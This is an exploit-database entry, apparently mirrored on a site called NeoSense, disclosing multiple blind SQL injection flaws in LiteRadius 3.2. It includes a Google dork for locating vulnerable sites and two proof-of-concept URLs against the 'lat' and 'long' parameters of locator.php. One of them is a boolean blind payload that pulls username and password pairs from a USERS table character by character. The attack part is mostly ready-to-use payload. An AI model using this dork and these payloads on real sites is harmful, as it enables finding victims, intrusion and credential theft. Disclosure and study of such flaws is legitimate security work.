[] NeoSense
E X P L O I T S
title author type platform port cve id

LiteRadius 3.2 - Multiple Blind SQL Injections

Author: Robert Cooper
type: webapps
platform: php
port: 
date_added: 2011-07-13 
date_updated: 2012-10-28 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: LiteRadius <= 3.2 - Multiple Blind SQL Injection vulnerabilities
# Google Dork: allinurl: locator.php?long=
# Date: 7/12/2011
# Author: Robert Cooper (admin[at]websiteauditing.org)
# Software Link: http://www.escaperadius.com/er/products/literadius/lr.php
# Tested on: [Linux/Windows 7]
#Vulnerable Parameters: lat=, long=

##############################################################
PoC:

http://domain.com/dealer/locator.php?parsed_page=1&lat=25.4405436315&long=132.710253334'
http://domain.com/dealer/locator.php?parsed_page=1&lat=25.4405436315&long=132.710253334 and ascii(substring((SELECT concat(username,0x3a,password,0x3a,0x0a) FROM USERS limit 0,1),1,1))>80


##############################################################
www.websiteauditing.org
www.areyousecure.net

# Shouts to the Belegit crew
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.